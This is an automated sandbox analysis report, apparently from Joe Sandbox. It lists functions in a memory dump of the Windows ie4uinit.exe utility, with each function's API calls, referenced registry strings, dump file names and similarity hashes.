Instruction ID: 2adfbd904a048727ac88de64fb94d3a62703377d3fb32ab16773bebc13626901
Opcode Fuzzy Hash: e3cf35c908b69a1a4c1a49ac493ed38e4b0f64ff1d8b174bb225fd4f1426a9cc
Instruction Fuzzy Hash: 4E117322719A8145FA509B19FD412E962A4AF84F80F454032EE4DC375EDE7CD8458640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5215300 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

SHDeleteValueW.SHLWAPI ref: 00007FF6B521533D
SHSetValueW.SHLWAPI ref: 00007FF6B5215396

Strings

iexplore.exe, xrefs: 00007FF6B5215328, 00007FF6B521536D
Software\Microsoft\Windows\CurrentVersion\Explorer\RemoveAccess, xrefs: 00007FF6B5215336, 00007FF6B5215378

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Value$Delete
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\RemoveAccess$iexplore.exe
API String ID: 1738766685-729631142
Opcode ID: f019ba072745d2f2f101c59ab4a81df3ae472c3fd583abc7b516db584f8a8bba
Instruction ID: bf42097b3f5d608ef603e7427a8103182af10df9ab37158b29b566e587474585
Opcode Fuzzy Hash: f019ba072745d2f2f101c59ab4a81df3ae472c3fd583abc7b516db584f8a8bba
Instruction Fuzzy Hash: 95114F61A1AA4281EA249B28ED553E62361FB94B64F400331DB6D836DEDF7DE905CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5214A10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32 ref: 00007FF6B5214A37
RegCreateKeyW.ADVAPI32 ref: 00007FF6B5214A51
RegSetValueExW.ADVAPI32 ref: 00007FF6B5214A9C

Strings

Implementing, xrefs: 00007FF6B5214A60

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CreateOpenValue
String ID: Implementing
API String ID: 2195001959-2263074448
Opcode ID: 317eef36383d362008ab749e517fdc5bdf2b5ebcc71cb4fdf7edef0913365292
Instruction ID: d19bbb954c9d4e65d9a69de45d1a3966b8fa419100bc886b91081ebbb8f4d961
Opcode Fuzzy Hash: 317eef36383d362008ab749e517fdc5bdf2b5ebcc71cb4fdf7edef0913365292
Instruction Fuzzy Hash: 6201CC72A2AB8185DB608B55FD5029AB3A4FB88FA0F500131EB9D87B5DDF3CD495CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521D760 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 00007FF6B521D796
SHSendMessageBroadcastW.SHLWAPI ref: 00007FF6B521D7CD

Strings

Software\Microsoft\Internet Explorer\SearchScopes, xrefs: 00007FF6B521D7BE
0u, xrefs: 00007FF6B521D77E

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: MessageSend$BroadcastTimeout
String ID: 0u$Software\Microsoft\Internet Explorer\SearchScopes
API String ID: 3425702700-4149236433
Opcode ID: 7d186d6492fd6aa618a3176d17e22ce627d2ec6857902fd2fcd9041473eaa155
Instruction ID: 87d87548852fc5832bf457acdf74cebb311ee3733e78bdac4a9c7a530147bf80
Opcode Fuzzy Hash: 7d186d6492fd6aa618a3176d17e22ce627d2ec6857902fd2fcd9041473eaa155
Instruction Fuzzy Hash: A4F0F472A0A7018BF764CF28EE406EA33A1FB44B45F104035CA4E83799DF3DE9468B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52176A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6B52176C7
GetProcAddress.KERNEL32 ref: 00007FF6B52176DE

Strings

ntdll.dll, xrefs: 00007FF6B52176C0
RtlDllShutdownInProgress, xrefs: 00007FF6B52176D4

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlDllShutdownInProgress$ntdll.dll
API String ID: 1646373207-582119455
Opcode ID: 5287d0483df1f5bfbfa107a53801fe468d64823904203b0b8f84d60e68cd571c
Instruction ID: 762700d79c59d27b1facc3125302b4d29015c259bc5ea0c5a58bce70a71bc5d1
Opcode Fuzzy Hash: 5287d0483df1f5bfbfa107a53801fe468d64823904203b0b8f84d60e68cd571c
Instruction Fuzzy Hash: F0F0DA64E0BB0289FE259B5DEE641F123A0AF58F50F481035CB4C8636AEF7CBC898350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5219508 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF6B521951A
wcschr.MSVCRT ref: 00007FF6B5219531
wcschr.MSVCRT ref: 00007FF6B5219546

Strings

.lnk, xrefs: 00007FF6B5219513, 00007FF6B521952A

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: wcschr
String ID: .lnk
API String ID: 1497570035-24824748
Opcode ID: 478046a9081302f0480f779facef97c11e0634dbe20bdcc55dd042c2a1884940
Instruction ID: d4d1bfbe74c56132e08191ee6183ec281502d59d8eee9097d8182c135eed01e7
Opcode Fuzzy Hash: 478046a9081302f0480f779facef97c11e0634dbe20bdcc55dd042c2a1884940
Instruction Fuzzy Hash: 05F01261A176039AFE618B18DE442F52365AF68F05F844034C60D8625FEF3C7D4A8B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52199B0 Relevance: 6.3, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF6B5219A18
CloseHandle.KERNEL32 ref: 00007FF6B5219A2B
CloseHandle.KERNEL32 ref: 00007FF6B5219A3E

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fcfd7331e435d7abd631c32b58dedaa9009deac4d8fa1b42bf3055aa938fa55f
Instruction ID: 1eb4b556989c6caf423a83aec53b6a13a909deef77b79ece1288e01892dc48cc
Opcode Fuzzy Hash: fcfd7331e435d7abd631c32b58dedaa9009deac4d8fa1b42bf3055aa938fa55f
Instruction Fuzzy Hash: C2217625B0AA1185EA249F5ADA912BA6364EF84FC0F1C4435DB8E83B5ECF3DF8518700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5228914 Relevance: 6.2, APIs: 4, Instructions: 204COMMON

Download Yara Rule

APIs

#651.IERTUTIL(00000001,?,?,?,00000001,00000001,?,00007FF6B52245A8), ref: 00007FF6B52289D3
CoTaskMemFree.OLE32(?,00000001,00000001,?,00007FF6B52245A8), ref: 00007FF6B5228AB6
CoTaskMemFree.OLE32(?,00000001,00000001,?,00007FF6B52245A8), ref: 00007FF6B5228B09

Part of subcall function 00007FF6B522A6F8: SysFreeString.OLEAUT32 ref: 00007FF6B522A743

CoTaskMemFree.OLE32(?,00000001,00000001,?,00007FF6B52245A8), ref: 00007FF6B5228B5E

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Free$Task$#651String
String ID:
API String ID: 2586053401-0
Opcode ID: 75bd6e6943d83bf5a8ebfd2af5cb8d0721f28f9732940ef182c506b54b3ce6d9
Instruction ID: dd313af0c6914dd425c784cc4226cd4fdea836c1ab37484663785e6d6ad66dd5
Opcode Fuzzy Hash: 75bd6e6943d83bf5a8ebfd2af5cb8d0721f28f9732940ef182c506b54b3ce6d9
Instruction Fuzzy Hash: FB81B166A19B8282FA608B59EE402FA6760FB44FC4F404035DF4DD7B5ADF7EE9068740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522716C Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B52260C0: SysFreeString.OLEAUT32 ref: 00007FF6B5226228

SysStringLen.OLEAUT32 ref: 00007FF6B52271B7
SysFreeString.OLEAUT32 ref: 00007FF6B52272AA
SysFreeString.OLEAUT32 ref: 00007FF6B52272B4

Part of subcall function 00007FF6B52251E0: WideCharToMultiByte.KERNEL32 ref: 00007FF6B5225231
Part of subcall function 00007FF6B52251E0: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B522563D), ref: 00007FF6B5225277

SysFreeString.OLEAUT32 ref: 00007FF6B52272C6

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$ByteCharMultiWide
String ID:
API String ID: 1147213928-0
Opcode ID: 912b7db5958562074d5dff0bf73cc603a27d2047330544aaa78ad7b93a7e22c1
Instruction ID: 4162f345c7c36af16849f49feff702e73647425a5a4d962c2af8d17a6fb8d454
Opcode Fuzzy Hash: 912b7db5958562074d5dff0bf73cc603a27d2047330544aaa78ad7b93a7e22c1
Instruction Fuzzy Hash: 7E419536F2AA5289E7108B659E004FD23B5BB44F94B140531DF5DA7B4DDF7AED028740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52222C8 Relevance: 6.1, APIs: 4, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5222420: StrCmpW.SHLWAPI(?,?,00000001,00007FF6B52222F4), ref: 00007FF6B522246A

#677.IERTUTIL ref: 00007FF6B52223A4
#654.IERTUTIL ref: 00007FF6B52223C7
GetProcessHeap.KERNEL32 ref: 00007FF6B52223D3
HeapFree.KERNEL32 ref: 00007FF6B52223E1

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$#654#677FreeProcess
String ID:
API String ID: 3027164600-0
Opcode ID: a0228dd2ef2ccff598f40f94b0f617d58f17ac72c7ca0d61ca9366e7715a55d6
Instruction ID: c8e85213840e900f4d261e73d3ed7c7e298ec6a0505a9b327df5c8b52ad72e97
Opcode Fuzzy Hash: a0228dd2ef2ccff598f40f94b0f617d58f17ac72c7ca0d61ca9366e7715a55d6
Instruction Fuzzy Hash: 5C419F36B15A5286EB048B69D9002EC73A5FB88F94F084132DF1C9779ACF3EE846C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52294B4 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32 ref: 00007FF6B522951B
VariantCopy.OLEAUT32 ref: 00007FF6B5229550
VariantCopy.OLEAUT32 ref: 00007FF6B5229583
SHStrDupW.SHLWAPI(?,?,00007FF6B5224112,?,00000000,?,00007FF6B521D223), ref: 00007FF6B52295CB

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CopyVariant
String ID:
API String ID: 3840901598-0
Opcode ID: 8ba60230642b5cebfc5b9678f6d8a93f4b0ac1eb1b5d0f5aed2864083eed01da
Instruction ID: f8ab06db9c59c1338fdafe1e27467cb4a64c922b187c5f433d7b06036ce97be7
Opcode Fuzzy Hash: 8ba60230642b5cebfc5b9678f6d8a93f4b0ac1eb1b5d0f5aed2864083eed01da
Instruction Fuzzy Hash: 41417E6AF1560686EB20CF29DA443AA73A0FB48B48F504035DB09C365DEF79ECE1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52338D0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF6B5233943
RtlLookupFunctionEntry.NTDLL ref: 00007FF6B5233962
RtlVirtualUnwind.NTDLL ref: 00007FF6B52339AF
__raise_securityfailure.LIBCMT ref: 00007FF6B5233A94

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 1afc0c836a71fe0cb30523bcfad7e1d4bea24c494408526ed91d439c61f99075
Instruction ID: ab5596b4996e1dba27ad823edf03a0c87dbb556ba7aad431f2ade75eafb2fa20
Opcode Fuzzy Hash: 1afc0c836a71fe0cb30523bcfad7e1d4bea24c494408526ed91d439c61f99075
Instruction Fuzzy Hash: 8541D63560AB4585EB109B08FDA03A573A4FB89B44F904136DB8D8376ADF3DE945C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522B8DC Relevance: 6.1, APIs: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

#791.IERTUTIL(?,?,?,?,00000000,?,?,00007FF6B522B44E), ref: 00007FF6B522B92D
CreateFileW.KERNEL32 ref: 00007FF6B522B95C
GetLastError.KERNEL32 ref: 00007FF6B522B965
#134.IERTUTIL ref: 00007FF6B522B9B2

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #134#791CreateErrorFileLast
String ID:
API String ID: 3111463030-0
Opcode ID: d0b15d3654442c8dea60c71dc28eaf8dacccae5dcb625bd1ce301684c44a06e4
Instruction ID: 27ee2fa26dee4303db68eeadffb208ff19f71f1feccf738dc84a18bca690e582
Opcode Fuzzy Hash: d0b15d3654442c8dea60c71dc28eaf8dacccae5dcb625bd1ce301684c44a06e4
Instruction Fuzzy Hash: A521F936B19B4186E7208F15AD802A97691BB99FB0F154335DFAA837D9CF3DE842C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522DDDC Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aee53172f4580d420a9a30e189f8fc0451ca67aa92be891b2eb99f90b2f2993
Instruction ID: f2e4d94fb242cc7a3a31409faa18ec870303c12fc31c6698575ede959c1e567c
Opcode Fuzzy Hash: 2aee53172f4580d420a9a30e189f8fc0451ca67aa92be891b2eb99f90b2f2993
Instruction Fuzzy Hash: 6211C631B0AB8285FB204F19BEC06A963D4AF68F90F548134DB8DC7659DF3DE8565700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522C018 Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B522B80C: SetFilePointer.KERNEL32(?,?,00000000,00007FF6B522C036), ref: 00007FF6B522B81A
Part of subcall function 00007FF6B522B80C: GetLastError.KERNEL32(?,?,00000000,00007FF6B522C036), ref: 00007FF6B522B827
Part of subcall function 00007FF6B522B80C: GetLastError.KERNEL32(?,?,00000000,00007FF6B522C036), ref: 00007FF6B522B83B

ReadFile.KERNEL32 ref: 00007FF6B522C058
GetLastError.KERNEL32 ref: 00007FF6B522C078
GetLastError.KERNEL32 ref: 00007FF6B522C08C

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: 1246d8e4e741d3e086ee3f763519d55967d5038ece7dce43a24273ac0f0a5280
Instruction ID: 0fd0bfe9880bad4413e20debda7b88bbfda07421aefbec04c633fb17e04815bd
Opcode Fuzzy Hash: 1246d8e4e741d3e086ee3f763519d55967d5038ece7dce43a24273ac0f0a5280
Instruction Fuzzy Hash: E611A265B19642C6E7208F69AE801AAB3A4BB48F80F544539DB4DC2719EE7EE8448B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5233AA4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF6B5233AAF
RtlLookupFunctionEntry.NTDLL ref: 00007FF6B5233ACE
RtlVirtualUnwind.NTDLL ref: 00007FF6B5233B1B
__raise_securityfailure.LIBCMT ref: 00007FF6B5233B91

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 2838714c1a5a295b1b30ecee9008a16367705d667df4a190e14286e372a10043
Instruction ID: baf6500766b73dbf27371d7a06bfdbb36a40360cc6a955051ccbbe0b35c8d162
Opcode Fuzzy Hash: 2838714c1a5a295b1b30ecee9008a16367705d667df4a190e14286e372a10043
Instruction Fuzzy Hash: 0221F63590AF4585EB109B08FE903A573A4FB49B94F500135DB8D8376ADF7DE845C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52169CC Relevance: 6.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

#650.IERTUTIL ref: 00007FF6B5216A0C
#678.IERTUTIL ref: 00007FF6B5216A27
GetProcessHeap.KERNEL32 ref: 00007FF6B5216A34
HeapFree.KERNEL32 ref: 00007FF6B5216A42

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$#650#678FreeProcess
String ID:
API String ID: 315297358-0
Opcode ID: d8765fef9b5ad4db35657f4e0e47e9dd36b265a927d237162de4f7ca882528a4
Instruction ID: 0158c1e97d75ec8fbf6605c823e8e198567b6289e8150d8c51f4226128342757
Opcode Fuzzy Hash: d8765fef9b5ad4db35657f4e0e47e9dd36b265a927d237162de4f7ca882528a4
Instruction Fuzzy Hash: 5B018B32A08B5187E7008B16E94869D73A9FB88FD4F698131DB4C83729DF39E946CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5228040 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00007FF6B5228089
VariantClear.OLEAUT32 ref: 00007FF6B5228092
VariantClear.OLEAUT32 ref: 00007FF6B522809C
CoTaskMemFree.OLE32 ref: 00007FF6B52280BA

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

